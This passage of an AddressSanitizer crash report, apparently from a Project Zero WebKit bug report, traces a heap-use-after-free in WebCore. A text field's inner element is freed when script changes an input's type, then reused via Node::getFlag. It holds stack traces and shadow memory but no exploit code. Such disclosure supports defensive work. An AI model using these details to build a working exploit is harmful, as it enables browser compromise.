#22 0x10977ba05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)
#23 0x10977b52f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)
#24 0x109744b35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bcb35)
#25 0x109745c83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bdc83)
#26 0x1097456aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bd6aa)
#27 0x109679b62 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7f1b62)
#28 0x109588aef in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x700aef)
#29 0x10958388e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fb88e)
#30 0x1098ef3a1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa673a1)
#31 0x1098ec8da in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa648da)
#32 0x1095a10ad in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7190ad)
#33 0x109a9b79d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1379d)
#34 0x10963624c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae24c)
#35 0x1095fa86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#36 0x1096028f5 in WebCore::DocumentLoader::maybeLoadEmpty() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77a8f5)
#37 0x109602cd7 in WebCore::DocumentLoader::startLoadingMainResource() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77acd7)
#38 0x1098f73a9 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6f3a9)
#39 0x10ae11275 in std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>::operator()(WebCore::ResourceRequest const&, WebCore::FormState*, bool) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f89275)
#40 0x10ae110cf in WebCore::PolicyCallback::call(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f890cf)
#41 0x10ae12a6a in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f8aa6a)
#42 0x101bc15ee in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5ac5ee)
#43 0x101bc1446 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5ac446)
#44 0x101bd181c in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5bc81c)
#45 0x10ae1242a in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WebCore::FormState*, std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f8a42a)
#46 0x1098f6208 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6e208)
#47 0x1098f4eed in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6ceed)
#48 0x1098f1c39 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WebCore::FormState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa69c39)
#49 0x1098f0210 in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa68210)
#50 0x101bd8805 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5c3805)
#51 0x10b67e168 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f6168)
#52 0x10b67c175 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f4175)
#53 0x10b67bd87 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f3d87)
#54 0x109ae195c in WebCore::HTMLFrameElementBase::openURL(WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc5995c)
#55 0x10921edb8 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396db8)
#56 0x10921d69a in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x39569a)
#57 0x109a7309c in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbeb09c)
#58 0x109a6c007 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe4007)
#59 0x109a9cd48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#60 0x109a9c902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#61 0x109a9bb94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#62 0x109a9d58d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#63 0x10950a661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
#64 0x1096361f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#65 0x1095fa86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#66 0x1090dafb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#67 0x1090d5b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#68 0x10b6867e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#69 0x101ef3615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#70 0x101ef2c2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#71 0x1018a11f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#72 0x1016c4448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#73 0x1016cd614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#74 0x106bb2a04 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6a04)
#75 0x106bb4f1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)
#76 0x7fff9632c7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
#77 0x7fff9630bf1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
#78 0x7fff9630b43e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
#79 0x7fff9630ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#80 0x7fff8c19a934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#81 0x7fff8c19a76e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#82 0x7fff8c19a5ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#83 0x7fff89fc5df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#84 0x7fff89fc5225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#85 0x7fff89fb9d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#86 0x7fff89f83367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#87 0x7fff82345193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#88 0x7fff82343bbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#89 0x1015fcb73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#90 0x7fff89ec35ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x60800005a3b4 is located 20 bytes inside of 96-byte region [0x60800005a3a0,0x60800005a400)
freed by thread T0 here:
#0 0x103bcfcf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x106bfd36f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)
#2 0x10b85d0cb in WTF::RefPtr<WebCore::TextControlInnerTextElement>::operator=(std::nullptr_t) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29d50cb)
#3 0x10b85cfd9 in WebCore::TextFieldInputType::destroyShadowSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29d4fd9)
#4 0x109af255f in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc6a55f)
#5 0x109af3972 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc6b972)
#6 0x109710bff in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x888bff)
#7 0x10971ef61 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x896f61)
#8 0x109710698 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x888698)
#9 0x10a379db6 in WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14f1db6)
#10 0x10a370eef in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14e8eef)
#11 0x105a0ab58 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70eb58)
#12 0x105a0ac85 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70ec85)
#13 0x1063edf95 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x10f1f95)
#14 0x1065a2223 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a6223)
#15 0x1065bdbfd in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c1bfd)
#16 0x1065c126c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#17 0x1065ba83a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)
#18 0x10627947d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)
#19 0x106203aa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)
#20 0x1058f5991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)
#21 0x1058f5abb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)
#22 0x1058f5e06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)
#23 0x109f3ab2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)
#24 0x10a220786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)
#25 0x10977ba05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)
#26 0x10977b52f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)
#27 0x109744b35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bcb35)
#28 0x109744ef4 in WebCore::MouseOrFocusEventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bcef4)
#29 0x109745c83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bdc83)
previously allocated by thread T0 here:
#0 0x103bcf790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff824145a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x106c06db4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190adb4)
#3 0x106bfc12b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190012b)
#4 0x106b93995 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1897995)
#5 0x10b843429 in WebCore::TextControlInnerTextElement::create(WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29bb429)
#6 0x10b85bd3c in WebCore::TextFieldInputType::createShadowSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29d3d3c)
#7 0x109aef4e3 in WebCore::HTMLInputElement::didAddUserAgentShadowRoot(WebCore::ShadowRoot*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc674e3)
#8 0x109713393 in WebCore::Element::addShadowRoot(WTF::Ref<WebCore::ShadowRoot>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88b393)
#9 0x109713d35 in WebCore::Element::ensureUserAgentShadowRoot() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88bd35)
#10 0x109af5144 in WebCore::HTMLInputElement::initializeInputType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc6d144)
#11 0x109711d77 in WebCore::Element::parserSetAttributes(WTF::Vector<WebCore::Attribute, 0ul, WTF::CrashOnOverflow, 16ul> const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x889d77)
#12 0x109a6ffd0 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe7fd0)
#13 0x109a6f1a5 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe71a5)
#14 0x109a70621 in WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe8621)
#15 0x109bcc698 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd44698)
#16 0x109bc94d6 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd414d6)
#17 0x109bc767e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd3f67e)
#18 0x109a9cd48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#19 0x109a9c902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#20 0x109a9bb94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#21 0x109a9d58d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#22 0x10950a661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
#23 0x1096361f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#24 0x1095fa86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#25 0x1090dafb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#26 0x1090d5b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#27 0x10b6867e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#28 0x101ef3615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#29 0x101ef2c2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x84ac) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const
Shadow bytes around the buggy address:
0x1c100000b420: fa fa fa fa 00 00 00 00 00 00 00 fc fc 00 00 fa
0x1c100000b430: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c100000b440: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c100000b450: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c100000b460: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c100000b470: fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd fd fd
0x1c100000b480: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c100000b490: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c100000b4a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c100000b4b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c100000b4c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
